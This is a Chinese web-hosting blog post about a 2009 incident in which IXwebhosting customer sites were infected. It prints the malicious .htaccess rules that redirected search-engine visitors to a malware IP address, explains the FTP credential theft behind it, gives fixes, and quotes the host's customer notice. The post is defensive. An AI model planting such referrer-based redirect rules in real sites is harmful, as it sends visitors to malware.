关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 2020 年美国虚拟主机 空间推荐 排名不分先后虚拟空间(主机)
- PacificRack→$9.99 年 KVM-1GB 13GB 2TB全球[VPS测评]
- SmartHost→$6.95 月 KVM-8GB 40GB 2TB 洛全球[VPS测评]
- 投稿 dedipath→32G 内存独立服务器低至$128 月 纯 SS独立服务器[U]
- AuroraCloud→40 元 月 1GB 内存 30GB 空间 2T虚拟空间(主机)
- 新商家慎重-StockServers→3.96 英镑 月 2 核 4G 全球[VPS测评]
- OneVPS - 首月 5 折优惠码 新加坡日本等 8 机房最低月付$4日本VPS[主机]
- 教程 VPS 快速搭建速度测试服务全球[VPS测评]
- CenterHop→$1.5 月 256MB 内存 5GB SSD 空间虚拟空间(主机)
- [11.11]滴滴云秒杀→2C4G2M 三年 468 元 2C4G5M 全球[VPS测评]
- 补货通知 搬瓦工 CN2 GIA 三网直连线路$49.99 年付机器补货全球[VPS测评]
- WordPress网站上传图片出现http报错解决办法全球[VPS测评]
- 搬瓦工年付19.99刀10G KVM CN2传家宝全球[VPS测评]
- 用XAMPP搭建本地PHP测试环境及安装WordPress全球[VPS测评]
- idc.wiki 160M内存 3G硬盘 400G流量 100M带宽 K全球[VPS测评]
- 什么是云服务器?云服务器怎么登陆?全球[VPS测评]
- 美国信贷市场的痛苦将不亚于上世纪70年代的通胀时期美国VPS[主机]
- Rustrot-深绿色UI电商网站模板HTML5框架全球[VPS测评]
- 极客主机,优惠8折充值返25%,香港CN2VPS,日本软银VPS,新加坡日本VPS[主机]
- swancloud:阿里云国际产品线,弹性云服务器等,便宜、无须实名、无全球[VPS测评]
- ucloud香港服务器怎么样?听听这些网友们怎么说的香港VPS[主机]
- JGKVM活动钜惠:美国cn2,香港cmi,大带宽vps,三网直连,10美国VPS[主机]
- 免备案香港云服务器好在哪里?为什么企业要用海外云主机或VPS?香港VPS[主机]
- 香港cn2线路服务器哪里好?香港cn2服务器推荐哪家好?香港VPS[主机]
- 情画数据:香港沙田CN2云服务器,2核/2G/5M带宽,年付200元香港VPS[主机]
- CoNoov:美国/日本/新加坡/英国/荷兰/西班牙/挪威/丹麦vps,日本VPS[主机]
- 咖啡主机:享受7、8折促销 美国vps仅需15.4元/月 香港vps仅需美国VPS[主机]
- 拼多多回应筹备跨境电商业务:不予置评全球[VPS测评]
- 恒星云:香港沙田CN2VPS低至9.9元/起_国内BGP云服务器4核4G香港VPS[主机]
- 青叶云怎么样?青叶云国内/国外弹性云服务器价格,海外vps低至25.6元全球[VPS测评]
转载请注明原文地址:http://140.238.13.167:12355/read-115994.html











